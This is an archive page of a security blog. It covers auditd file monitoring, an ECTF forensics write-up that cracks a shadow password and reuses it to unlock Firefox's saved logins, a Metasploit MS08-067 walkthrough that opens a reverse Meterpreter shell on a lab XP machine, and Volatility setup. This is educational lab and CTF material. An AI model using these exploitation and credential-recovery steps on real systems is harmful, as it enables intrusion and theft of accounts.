Archive for the ‘Technical’ Category

Auditing File Events in Linux

December 29, 2014

Audit Linux is an open source framework which monitors files and folders and records useful accounting information whenever an event occurs on them. For example, you can deploy the framework to detect policy violations in your company, and the logged information provides probative evidence for forensic purposes. Audit Linux answers the following questions:

1. How can I track the changes when my file is modified?

2. How will I know which user in my computer accessed a file?

3. Which application program is used to access the file?

4. At what time a particular event happened?

5. What is the inode number? And more.

Beyond the above, it provides a variety of other information. Audit Linux is comprised of auditctl, ausearch, aureport, auditd, audispd, autrace, aulast, aulastlog, ausyslog and auvirt. Today we are going to look at only the following tools:

auditctl – The tool that sets up monitoring of all the events on a file we are interested in.

ausearch – A tool for displaying the logged events.

aureport – Prepares a brief report from the collected logs.

To install the framework in Ubuntu,

$ sudo apt-get install auditd audispd-plugins

This is how we usually monitor a file,

➜  ~ [255] sudo auditctl -w /home/h1dd3ntru7h/demo.txt -p rwxa -k pattern1

-p – any read/write/execute/append on the file demo.txt will be logged. The -k flag attaches a key that uniquely identifies this particular activity when there are too many log entries.

To see which applications have accessed the file, we use ausearch. If you have set up watches on multiple files, you can use the -k flag to pick out only the log entries for demo.txt. You can also use it like this:

$ sudo ausearch -f demo.txt -k pattern1


➜  ~ [0] sudo ausearch -f  demo.txt
----
time->Sun Dec 28 20:01:41 2014
type=PATH msg=audit(1419777101.038:189): item=0 name="demo.txt" inode=2883912 dev=08:06 mode=0100664 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL
type=CWD msg=audit(1419777101.038:189):  cwd="/home/h1dd3ntru7h"
type=SYSCALL msg=audit(1419777101.038:189): arch=c000003e syscall=2 success=yes exit=3 a0=7fffd1b3978a a1=0 a2=1fffffffffff0000 a3=7fffd1b38b70 items=1 ppid=8610 pid=16233 auid=4294967295 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts1 ses=4294967295 comm="cat" exe="/bin/cat" key="pattern1"

i) uid=1000 is the user who accessed this file; here it is me. You can use the id command to map the number to a user name.

ii) tty=pts1 – If I am correct there are 7 controlling terminals in Linux (Ubuntu), which you can switch between using Ctrl+Alt+(F1 | F2 … | F7). By default we log in on tty1. Try opening the file from tty2 and the tty value will show as tty2. Now you may ask why the value of tty is not tty1|tty2…|tty7 but pts1..pts7. If you use a console terminal, the value can be any of the ttys; but when you use an xterm or an ssh session, the value will be one of the pts entries. If you have accessed the same file from another machine using ssh, the tty value will be from any of the seven controlling terminals. For example, below the tty value comes from a different console (pts6), when I displayed a file from another machine.


time->Sun Dec 28 23:34:44 2014
type=PATH msg=audit(1419789884.132:336): item=0 name="file.txt" inode=2883678 dev=08:06 mode=0100664 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL
type=CWD msg=audit(1419789884.132:336):  cwd="/home/h1dd3ntru7h"
type=SYSCALL msg=audit(1419789884.132:336): arch=c000003e syscall=2 success=yes exit=3 a0=7fff68de3c3a a1=0 a2=1fffffffffff0000 a3=7fff68de1da0 items=1 ppid=21137 pid=21277 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts6 ses=2 comm="cat" exe="/bin/cat" key="pattern2"

You can also check who is currently logged in to your machine using the “last” command.

iii) audit(1419777101.038:189) == Sun Dec 28 20:14:18 IST 2014. The converted epoch time is printed in the time-> line above the audit() records, or you can convert it manually with the date command:


➜  ~ [0] date -d @1419777858.320
Sun Dec 28 20:14:18 IST 2014

iv) inode=2883912: to get more information about the inode entry, pass the inode number to the debugfs tool:


➜  ~ [0] sudo debugfs /dev/sda6  #sda6 is where my / is mounted
debugfs 1.42.9 (4-Feb-2014)
debugfs:  stat <2883912> # inode entry for demo.txt

Inode: 2883912   Type: regular    Mode:  0600   Flags: 0x80000
Generation: 1756762240    Version: 0x00000000:00000001
User:  1000   Group:  1000   Size: 3811
File ACL: 0    Directory ACL: 0
Links: 1   Blockcount: 8
Fragment:  Address: 0    Number: 0    Size: 0
ctime: 0x54a01453:4085c294 -- Sun Dec 28 20:01:47 2014
atime: 0x54a01453:4085c294 -- Sun Dec 28 20:01:47 2014
mtime: 0x54a01453:4085c294 -- Sun Dec 28 20:01:47 2014
crtime: 0x54a01453:4085c294 -- Sun Dec 28 20:01:47 2014
Size of extra inode fields: 28
EXTENTS:
(0):11567128

The inode gives much more information now, with 3 timestamps: change time (ctime), modification time (mtime) and access time (atime). If you delete the file and then run the same stat again, you will notice another timestamp, dtime, which records the time at which the file was deleted.

v) I guess the rest are self-explanatory. 🙂

If you add -i to ausearch, you see the user name (not the numeric user id) and the system call name instead of the system call number.

➜  ~ [0] sudo ausearch -f demo.txt -i

type=PATH msg=audit(Sunday 28 December 2014 �@.320:220) : item=0 name=demo.txt inode=2883987 dev=08:06 mode=file,664 ouid=h1dd3ntru7h ogid=h1dd3ntru7h rdev=00:00 nametype=NORMAL
type=CWD msg=audit(Sunday 28 December 2014 �@.320:220) :  cwd=/home/h1dd3ntru7h
type=SYSCALL msg=audit(Sunday 28 December 2014 �@.320:220) : arch=x86_64 syscall=open success=yes exit=3 a0=0x7ffffae07cbf a1=O_RDONLY a2=0x1fffffffffff0000 a3=0x7ffffae05aa0 items=1 ppid=16673 pid=16886 auid=unset uid=h1dd3ntru7h gid=h1dd3ntru7h euid=h1dd3ntru7h suid=h1dd3ntru7h fsuid=h1dd3ntru7h egid=h1dd3ntru7h sgid=h1dd3ntru7h fsgid=h1dd3ntru7h tty=tty2 ses=unset comm=cat exe=/bin/cat key=pattern1

You can also find the logs using:

Process id: ➜  ~ [0] sudo ausearch -f demo.txt --pid 16886
User id: ➜  ~ [0] sudo ausearch -f demo.txt --uid h1dd3ntru7h
Using an application: ➜  ~ [0] sudo ausearch -f demo.txt -x cat

Some cool stuff that we can do using Audit Linux.

Login attempts: ➜  ~ [0] sudo aureport -i -au --success   (or --failure for failed attempts)

For a detailed report: ➜  ~ [1] sudo aureport
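A small parser for the raw records shown above, added here as an example and not part of the original post: it groups the PATH/CWD/SYSCALL records of one audit serial into a single event and answers the post's questions (who, which program, which terminal, when, which -k key). The two sample records are constructed from the fields in the post's output, and the syscall table covers only the `open` call (number 2 on x86_64) that those records show.

```python
#!/usr/bin/env python3
"""Group raw auditd records (as `ausearch -f demo.txt` prints them) into one
event per audit serial and summarise who touched the watched file, from which
program and terminal, and under which -k key.  Added example, not code from
the original post; the sample records below are constructed from the fields
shown in the post's output."""
import re
import shlex
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample in the exact layout ausearch prints (without -i).
SAMPLE = """----
time->Sun Dec 28 20:01:41 2014
type=PATH msg=audit(1419777101.038:189): item=0 name="demo.txt" inode=2883912 dev=08:06 mode=0100664 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL
type=CWD msg=audit(1419777101.038:189):  cwd="/home/h1dd3ntru7h"
type=SYSCALL msg=audit(1419777101.038:189): arch=c000003e syscall=2 success=yes exit=3 a0=7fffd1b3978a a1=0 a2=1fffffffffff0000 a3=7fffd1b38b70 items=1 ppid=8610 pid=16233 auid=4294967295 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts1 ses=4294967295 comm="cat" exe="/bin/cat" key="pattern1"
----
time->Sun Dec 28 23:34:44 2014
type=PATH msg=audit(1419789884.132:336): item=0 name="file.txt" inode=2883678 dev=08:06 mode=0100664 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL
type=CWD msg=audit(1419789884.132:336):  cwd="/home/h1dd3ntru7h"
type=SYSCALL msg=audit(1419789884.132:336): arch=c000003e syscall=2 success=yes exit=3 a0=7fff68de3c3a a1=0 a2=1fffffffffff0000 a3=7fff68de1da0 items=1 ppid=21137 pid=21277 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts6 ses=2 comm="cat" exe="/bin/cat" key="pattern2"
"""

# type=<RECORD> msg=audit(<epoch>.<ms>:<serial>): <key=value ...>
RECORD_RE = re.compile(r"^type=(\w+) msg=audit\((\d+)\.(\d+):(\d+)\):\s*(.*)$")

UNSET = "4294967295"  # what `ausearch -i` displays as "unset" (an unsigned -1)

# x86_64 syscall numbers seen in the post; `ausearch -i` does this mapping for you
SYSCALL_NAMES = {2: "open"}


def parse_records(text):
    """Return {serial: {"_ts": epoch_float, "PATH": {...}, "CWD": {...}, "SYSCALL": {...}}}."""
    events = defaultdict(dict)
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue  # "----" separators and time-> lines carry no fields
        rtype, secs, frac, serial, rest = m.groups()
        # shlex honours the double quotes around name="..." and exe="..."
        fields = dict(tok.split("=", 1) for tok in shlex.split(rest) if "=" in tok)
        ev = events[int(serial)]
        ev.setdefault("_ts", float(f"{secs}.{frac}"))
        ev[rtype] = fields
    return dict(events)


def summarise(event):
    """Flatten one grouped event into the questions the post asks: who, what, when, how."""
    sc = event.get("SYSCALL", {})
    path = event.get("PATH", {})
    tty = sc.get("tty", "")
    return {
        "when_utc": datetime.fromtimestamp(event["_ts"], timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "file": path.get("name"),
        "inode": int(path["inode"]) if "inode" in path else None,
        "cwd": event.get("CWD", {}).get("cwd"),
        "uid": int(sc["uid"]),
        # auid is the login uid; it survives su/sudo, so it is the field to trust for attribution
        "auid": None if sc.get("auid", UNSET) == UNSET else int(sc["auid"]),
        "exe": sc.get("exe"),
        "syscall": SYSCALL_NAMES.get(int(sc["syscall"]), sc["syscall"]),
        "success": sc.get("success") == "yes",
        # pts* = xterm/ssh pseudo-terminal, tty* = a console (Ctrl+Alt+Fn), as the post explains
        "pseudo_terminal": tty.startswith("pts"),
        "key": sc.get("key"),
    }


def events_for_key(events, key):
    """Serials of the events tagged with a given `auditctl -k` key (what `ausearch -k` selects)."""
    return sorted(s for s, ev in events.items() if ev.get("SYSCALL", {}).get("key") == key)


if __name__ == "__main__":
    evs = parse_records(SAMPLE)
    for serial in sorted(evs):
        print(serial, summarise(evs[serial]))
    print("pattern1 events:", events_for_key(evs, "pattern1"))
```

Times are reported in UTC so the result does not depend on the analyst's time zone; the post's time-> lines are in the machine's local zone (IST).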

ECTF 2014 Forensics 400 Help Bob writeup

October 19, 2014

This is the question,

Message from Bob:
Hello Hacker!
I am having troubles in finding the unique flag assigned to me.
Here are some files from my system.
Could you please help me out?

They gave us the etc, sbin and home directories. When I saw the words “unique flag” many things went through my mind! Could it be an SSH private key? Is there something in Linux which uniquely identifies every machine or user within the etc directory? Or is it the actual challenge file they are asking for? I didn’t understand! I asked the admin in the IRC to explain the term unique flag, but he refused to. Then I pasted whatever strings I found that looked like an md5sum, but none of them worked! I left the challenge unsolved and started looking at the others. I came back to this challenge around 10 pm, with my team mates sitting next to me. I asked one of them to read the question and tell me what he understood; different people approach a problem differently.

He asked me to crack the user’s password from the shadow file. I had seen this in the morning too, but I didn’t think of cracking it since password cracking consumes more time and I was too lethargic to do it. Then I tried cracking the user bob’s hash with JTR.

➜  etc [0] john shadow                                                                                                                                                                
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:09 99% 1/3 0g/s 302.2p/s 302.2c/s 302.2C/s b999991930..bob999991906
Phoenix1         (bob)
1g 0:00:00:24 100% 2/3 0.04084g/s 299.1p/s 299.1c/s 299.1C/s Phoenix1..Alice1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Yes, we have cracked bob’s password. What to do next? This is where the question’s description lacked clarity; there is no clue from this step pointing anywhere. But I saw the Firefox folder inside the etc directory. I wanted to be evil for some time, so I thought of recovering the user names and passwords of all the users who had used the same browser. Yes, we can find them inside the profiles directory. Last year I designed a challenge for InCTF on password acquisition from an outdated Firefox browser.

Whenever you log in to your web accounts, Firefox gives you an option to save the passwords. When you choose “Remember password”, Firefox stores them in key3.db and in signons.sqlite, which can be found under /home/user_name/.mozilla/firefox/blab.username. The passwords stored in signons.sqlite are encrypted, and they are decrypted using the key3.db file; mostly the encryption mechanism is 3-DES and Base64. If you can acquire these two files from any machine then you can crack the passwords stored inside. Firefox has since modified its security mechanism by adding a master key, which gives you double protection: if you have configured the master key in your Firefox browser, then even after getting key3.db and signons.sqlite from your machine, no one can easily find the user name and password unless they have your master key.

So I took the “xk3nvgis.Bob” folder from bob’s home folder and tried cracking it using Firefox Password Viewer. It didn’t work even after configuring everything. I didn’t know whether the user had set a master password, let alone what it was! So I just tried bob’s password (“Phoenix1”), which I found after cracking the shadow file. Bingo! It worked! The user bob had used his login password as his master key password.
[screenshot: ECTF14_bob]
You can see the user name and password. Go to the URL and try logging in with the cracked credentials. I didn’t check the user name given there; I used “bob@bob.com” with the password “SEED MAJOR SMOKE WORK” and logged into the website. It looks like the actual contest portal, but it is designed specifically for this challenge. Once inside, I didn’t find anything that gave the flag; all I saw was the home page of the ECTF website again.
[screenshot: ECTF15_bob_login]
Then I remembered something I had done the same morning. Going through the bash history, I had noticed a wget command which downloads a file from the same website we were now logged into.
➜  bob [0] cat .bash_history
ls -la
ls
ls -la
cd ../
ls
cd bob/
ls
ls -la
firefox
ls -la
wget http://ancient-citadel-9348.herokuapp.com/giff_flag
ls cd ../
cd bob/
vim ~/.bash_profile
cd Documents
I pasted the same URL into the browser where we were logged in as bob, and I got this!
[screenshot: ECTF15_bob_final]
We pwned it after struggling a lot! Only very few teams, including us, solved this challenge. The message of the challenge is: use a ** Master Key ** if you are using Firefox. Make sure you configure the master key in your Firefox browser. This is how it is configured, click here.

Exploiting Parsing Flaw in Windows using Metasploit

August 23, 2014

In this article I am going to show you how to exploit the parsing flaw vulnerability in NetAPI32.dll using Metasploit. You can normally see this module (the DLL file) running in your task manager; many applications use it to access the Microsoft network. This vulnerability is considered one of the most critical ones exploited in October 2008, and the target machines were Windows machines. When exploited, it allows an attacker to execute arbitrary code on the target machine. You can read about this exploit from CVE 2008-4250 and also from here. The vulnerability is caused by the Server service not handling crafted RPC requests properly. So we will get started with setting up the environment. The host machine I am going to use is Linux and the target machine is Windows XP Service Pack 3.

Pre-requisites:

  1. Take a Windows XP machine which is not patched and boot it in a virtual machine. You can use either VirtualBox or VMware.
  2. Turn off the firewall in the Windows machine.
  3. Make sure you are able to ping bi-directionally between the host and guest machines.
  4. If you are not able to ping your target machine, try removing the iptables entries and check again.

[screenshot: msfconsol3]

[screenshot: msfconsol4]

Well, bi-directional ping is working. If you have any issues with bi-directional ping on your machine, let me know in the comments; I faced some issues before finishing the setup. When everything is good, start the Metasploit framework on your host machine.


➜ ~ [0] sudo msfconsole
[sudo] password for h1dd3ntru7h:

[screenshot: msfconsole1]

Now search for the exploit, or directly copy and paste the module path used in the next step.


msf exploit(ms08_067_netapi) > search netapi
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name Disclosure Date Rank Description
 ---- --------------- ---- -----------
 exploit/windows/smb/ms03_049_netapi 2003-11-11 good MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
 exploit/windows/smb/ms06_040_netapi 2006-08-08 good MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
 exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
 exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption

If you want more information about this exploit, use the info command in the console. It gives the CVE details, exploit description, supported OS service packs and the reference links. Choose the last entry:


msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi

Now you need to specify the target machine’s IP address in the console: set rhost to your target machine’s IP address.


msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name
-- ----
0 Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost 10.30.11.245
rhost => 10.30.11.245

You are ready to pwn your target machine. Run exploit!


msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.30.9.73:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769536 bytes) to 10.30.11.245
[*] Meterpreter session 1 opened (10.30.9.73:4444 -> 10.30.11.245:1054) at 2014-08-23 19:02:12 +0530

meterpreter >

That’s a successful exploit. Your target machine is now under your control. You can run arbitrary commands in the meterpreter shell. For example,


meterpreter > ifconfig

Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1

Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 08:00:27:93:75:9c
MTU : 1500
IPv4 Address : 10.30.11.245
IPv4 Netmask : 255.255.252.0

meterpreter > 

I am going to read a text file named “secret_information.txt.txt”, located on the target machine’s Desktop, from the meterpreter shell.

[screenshot: msfconsole5]


meterpreter > pwd
C:\WINDOWS\system32

meterpreter > cd ../../

meterpreter > cd Documents\ and\ Settings

meterpreter > ls

Listing: C:\Documents and Settings
==================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2014-03-06 12:13:24 +0530 .
40777/rwxrwxrwx 0 dir 1980-01-01 00:00:00 +0530 ..
40777/rwxrwxrwx 0 dir 2012-11-19 16:50:34 +0530 All Users
40777/rwxrwxrwx 0 dir 2012-11-19 18:37:48 +0530 Default User
40777/rwxrwxrwx 0 dir 2012-11-19 18:36:53 +0530 LocalService
40777/rwxrwxrwx 0 dir 2012-11-19 16:54:25 +0530 NetworkService
40777/rwxrwxrwx 0 dir 2014-08-10 19:31:19 +0530 h1dd3ntru7h

meterpreter > cd h1dd3ntru7h/Desktop

meterpreter > cat secret_information.txt.txt
He he I know you will exploit me! Fixme soon! Turn on the updates!

meterpreter >

Cool, huh! Make sure you fix this vulnerability by turning on your Windows updates. I will get back to you with a different exploit next time. Happy hacking!

Installing Linux Profile in Volatility

As I said in my previous blog, it is necessary to note that you need a compatible system profile to analyse a RAM memory dump. That is, if you have a profile built for kernel 3.2.15, then you can only analyse memory dumps from machines running the same kernel version, 3.2.15. If you want to analyse another kernel version’s RAM memory, you need to build a profile for that kernel version separately in your Volatility tool. Before going to the building part, let me make clear what I mean by a profile: it is a file (a zip file) in which we compress the kernel data structures and debug symbols. Volatility uses this zip file to mine critical information and to parse the objects inside the memory. In the next blog I will tell you which tools you can use to collect memory dumps from various OSs, with a demonstration on a sample RAM memory dump. For now, I will show you how to successfully build a Linux profile for your Volatility tool.

Determine your kernel version:

bios@bios-VirtualBox:~$ uname -mrs
Linux 3.13.0-24-generic x86_64

Installing a pre-requisite package:

bios@bios-VirtualBox:~$ sudo apt-get install dwarfdump

Creating vtypes:

Some of you might have encountered this issue while creating the vtypes.

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux$ make
make -C //lib/modules/3.13.0-24-generic/build CONFIG_DEBUG_INFO=y M=/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux modules
make[1]: Entering directory `/usr/src/linux-headers-3.13.0-24-generic'
  CC [M]  /home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux/module.o
/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux/module.c:70:33: fatal error: linux/net_namespace.h: No such file or directory
 #include <linux/net_namespace.h>
                                 ^
compilation terminated.
make[2]: *** [/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux/module.o] Error 1
make[1]: *** [_module_/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux] Error 2
make[1]: Leaving directory `/usr/src/linux-headers-3.13.0-24-generic'
make: *** [dwarf] Error 2

This is not the right way to do it. Here is the solution; follow the steps properly.

bios@bios-VirtualBox:~/Desktop/volatility-2.3.1$ cd tools/linux

bios@bios-VirtualBox:~$ sudo chown -R bios Desktop/volatility-2.3.1/tools/linux/

Now make. You should not get any errors at the end of the make.

bios@bios-VirtualBox:~/Desktop/volatility-2.3.1/tools/linux$ make
make -C //lib/modules/3.5.0-49-generic/build CONFIG_DEBUG_INFO=y M=/home/bios/Desktop/volatility-2.3.1/tools/linux modules
make[1]: Entering directory `/usr/src/linux-headers-3.5.0-49-generic'
CC [M] /home/bios/Desktop/volatility-2.3.1/tools/linux/module.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/bios/Desktop/volatility-2.3.1/tools/linux/module.mod.o
LD [M] /home/bios/Desktop/volatility-2.3.1/tools/linux/module.ko
make[1]: Leaving directory `/usr/src/linux-headers-3.5.0-49-generic'
dwarfdump -di module.ko > module.dwarf
make -C //lib/modules/3.5.0-49-generic/build M=/home/bios/Desktop/volatility-2.3.1/tools/linux clean
make[1]: Entering directory `/usr/src/linux-headers-3.5.0-49-generic'
CLEAN /home/bios/Desktop/volatility-2.3.1/tools/linux/.tmp_versions
CLEAN /home/bios/Desktop/volatility-2.3.1/tools/linux/Module.symvers
make[1]: Leaving directory `/usr/src/linux-headers-3.5.0-49-generic'

Making the Profile:

Go to the /boot directory and create the profile by zipping the module.dwarf just built together with the kernel's System.map file.

bios@bios-VirtualBox:/boot$ ls -l
total 48888
-rw-r--r-- 1 root root 848290 Jan 25 2013 abi-3.5.0-23-generic
-rw-r--r-- 1 root root 853859 May 3 03:16 abi-3.5.0-49-generic
-rw-r--r-- 1 root root 147880 Jan 25 2013 config-3.5.0-23-generic
-rw-r--r-- 1 root root 148168 May 3 03:16 config-3.5.0-49-generic
drwxr-xr-x 3 root root 12288 May 22 10:42 grub
-rw-r--r-- 1 root root 15543822 May 2 14:44 initrd.img-3.5.0-23-generic
-rw-r--r-- 1 root root 15694176 May 22 10:42 initrd.img-3.5.0-49-generic
-rw-r--r-- 1 root root 176764 Nov 27 2011 memtest86+.bin
-rw-r--r-- 1 root root 178944 Nov 27 2011 memtest86+_multiboot.bin
-rw------- 1 root root 3023265 Jan 25 2013 System.map-3.5.0-23-generic
-rw------- 1 root root 3025898 May 3 03:16 System.map-3.5.0-49-generic
-rw-r--r-- 1 root root 5189248 Aug 2 2013 vmlinuz-3.5.0-23-generic
-rw------- 1 root root 5191616 May 3 03:16 vmlinuz-3.5.0-49-generic

bios@bios-VirtualBox:~$ sudo zip Desktop/volatility-2.3.1/volatility/plugins/overlays/linux/ubuntu-12.04-amd64_3.5.0-49-generic.zip Desktop/volatility-2.3.1/tools/linux/module.dwarf /boot/System.map-3.5.0-49-generic
updating: Desktop/volatility-2.3.1/tools/linux/module.dwarf (deflated 90%)
adding: boot/System.map-3.5.0-49-generic (deflated 79%)

Checking the installation:

If everything goes smoothly without any error then you are done creating the Linux profile. Hurray! Now you can check whether everything went your way:

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ vol3 --info | grep "linux"

Volatility Foundation Volatility Framework 2.3.1
linux_arp - Print the ARP table
linux_banner - Prints the Linux banner information
linux_bash - Recover bash history from bash process memory
linux_check_afinfo - Verifies the operation function pointers of network protocols
linux_check_creds - Checks if any processes are sharing credential structures
linux_check_evt_arm - Checks the Exception Vector Table to look for syscall table hooking
linux_check_fop - Check file operation structures for rootkit modifications
linux_check_idt - Checks if the IDT has been altered
[stripped]

You can see the plugins listed, which confirms that the Linux profile was built.

 

Checking for the Linux profile version:

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ vol3 --info | grep "Linux"
Volatility Foundation Volatility Framework 2.3.1
linux_banner - Prints the Linux banner information
linux_yarascan - A shell in the Linux memory image
LinuxUbuntu1204x64 - A Profile for Linux Ubuntu1204 x64
Linuxubuntu-14_04-desktop-amd64_3_13_0-24-genericx64 - A Profile for Linux ubuntu-14.04-desktop-amd64_3.13.0-24-generic x64

If you face any issues while building the Linux profile, I will help you fix them. Let me know through the comments.
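As an added example (not code from this post or from the Volatility project), here is a check a practitioner can run on the finished profile zip before pointing it at an image: it confirms the zip holds exactly one module.dwarf and one System.map, that the System.map release matches the kernel the dump came from (the compatibility rule this post insists on), and it reproduces the profile name that `--info` lists from the zip's basename, as the listing above shows for ubuntu-14.04-desktop-amd64_3.13.0-24-generic.zip. The file contents used in demo() are constructed stand-ins with the shape of the real files.

```python
#!/usr/bin/env python3
"""Sanity-check a Volatility 2.x Linux profile zip before using it on an image.
Added example, not code from the original post or the Volatility project.
Assumptions: the zip holds exactly one module.dwarf (output of `dwarfdump -di`)
and one /boot/System.map-<release>, and Volatility derives the profile name
from the zip's basename the way the post's `--info` output shows."""
import io
import re
import zipfile

SYSMAP_NAME_RE = re.compile(r"System\.map-(?P<release>[^/]+)$")
# System.map lines are `<hex address> <nm type letter> <symbol>`
SYSMAP_LINE_RE = re.compile(r"^[0-9a-fA-F]{8,16} [A-Za-z] \S+$")


def profile_name_from_zip(zip_basename, arch="x64"):
    """Reproduce the profile name Volatility lists: "Linux" + zip stem with dots
    turned into underscores + arch, e.g. the post's
    ubuntu-14.04-desktop-amd64_3.13.0-24-generic.zip ->
    Linuxubuntu-14_04-desktop-amd64_3_13_0-24-genericx64."""
    stem = zip_basename[:-4] if zip_basename.endswith(".zip") else zip_basename
    return "Linux" + stem.replace(".", "_") + arch


def validate_profile_zip(data, expected_release):
    """Return (ok, problems) for the raw bytes of a profile zip."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        dwarfs = [n for n in names if n.endswith(".dwarf")]
        sysmaps = [n for n in names if SYSMAP_NAME_RE.search(n)]
        if len(dwarfs) != 1:
            problems.append(f"expected exactly one .dwarf member, found {len(dwarfs)}")
        if len(sysmaps) != 1:
            problems.append(f"expected exactly one System.map member, found {len(sysmaps)}")
        if sysmaps:
            release = SYSMAP_NAME_RE.search(sysmaps[0]).group("release")
            if release != expected_release:
                # the post's rule: a profile only fits the exact kernel it was built on
                problems.append(f"System.map is for kernel {release} but the image runs {expected_release}")
            head = zf.read(sysmaps[0]).decode("ascii", errors="replace").splitlines()[:5]
            if not head or not all(SYSMAP_LINE_RE.match(line) for line in head):
                problems.append("System.map content is not 'address type symbol' lines")
        if dwarfs and b"DW_TAG_" not in zf.read(dwarfs[0]):
            # dwarfdump output with no DW_TAG entries means the module carried no debug info
            problems.append("module.dwarf has no DW_TAG entries; rebuild with CONFIG_DEBUG_INFO=y")
    return (not problems, problems)


def build_zip(members):
    """Build an in-memory zip from {name: text}; stands in for the post's `zip` command."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, text in members.items():
            zf.writestr(name, text)
    return buf.getvalue()


# Constructed stand-ins with the shape of the real files (a few lines each).
FAKE_DWARF = (".debug_info\n\nCOMPILE_UNIT<header overall offset = 0>:\n"
              "< 0><0x0000000b>  DW_TAG_compile_unit\n")
FAKE_SYSMAP = ("0000000000000000 D __per_cpu_start\n"
               "ffffffff81000000 T _text\n"
               "ffffffff81000000 T startup_64\n")


def demo(image_release="3.5.0-49-generic"):
    """Validate a matching profile and a mismatched one (the two kernels in the post)."""
    good = build_zip({"Desktop/volatility-2.3.1/tools/linux/module.dwarf": FAKE_DWARF,
                      "boot/System.map-3.5.0-49-generic": FAKE_SYSMAP})
    mismatched = build_zip({"Desktop/volatility-2.3.1/tools/linux/module.dwarf": FAKE_DWARF,
                            "boot/System.map-3.13.0-24-generic": FAKE_SYSMAP})
    return validate_profile_zip(good, image_release), validate_profile_zip(mismatched, image_release)


if __name__ == "__main__":
    print(profile_name_from_zip("ubuntu-12.04-amd64_3.5.0-49-generic.zip"))
    for ok, problems in demo():
        print("OK" if ok else "PROBLEMS: " + "; ".join(problems))
```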

Installing Volatility in Ubuntu

May 22, 2014

Volatility is a memory forensics framework for analysing RAM memory dumps from Windows, Linux and Mac. In order to analyse an operating system’s RAM memory in Volatility, you need to build the corresponding operating system’s profile. By default the Windows profiles are built into Volatility; for a Linux or Mac memory dump you have to build the profiles yourself. The most important thing to note is that you cannot build a profile on a 3.13 kernel system and use it to analyse a memory dump from a 3.10 kernel system. In this article I am going to show you how to install Volatility on your machine, and in the next blog I will show you how to create Linux profiles to analyse Linux RAM memory. Please note, I am using Ubuntu 12.04, amd64. Also, install the packages in the order given below, and make sure no errors appear while installing the dependencies and libraries.

[Update] You can also refer to Volatility’s github for the latest updates about dependencies.

Step 1: Installing dependencies

h1dd3ntru7h@bi0s:~$ sudo apt-get install subversion pcregrep libpcre++-dev python-dev -y

Step 2: Installing PyCrypto

You can either use pip to install the library or download the source from here and install it.

h1dd3ntru7h@bi0s:~/Apps$ tar -zxvf pycrypto-2.6.1.tar.gz

h1dd3ntru7h@bi0s:~/Apps/pycrypto-2.6.1$ python  setup.py build

h1dd3ntru7h@bi0s:~/Apps/pycrypto-2.6.1$ sudo python setup.py build install

Step 3: Installing distorm3

distorm3 is a disassembler library for x86/AMD64. You can download the source from here.

h1dd3ntru7h@bi0s:~/Apps/distorm3$ unzip distorm3.zip

h1dd3ntru7h@bi0s:~/Apps$ cd distorm3/

h1dd3ntru7h@bi0s:~/Apps/distorm3$ python setup.py build

h1dd3ntru7h@bi0s:~/Apps/distorm3$ python setup.py build install

Step 4: Installing Yara

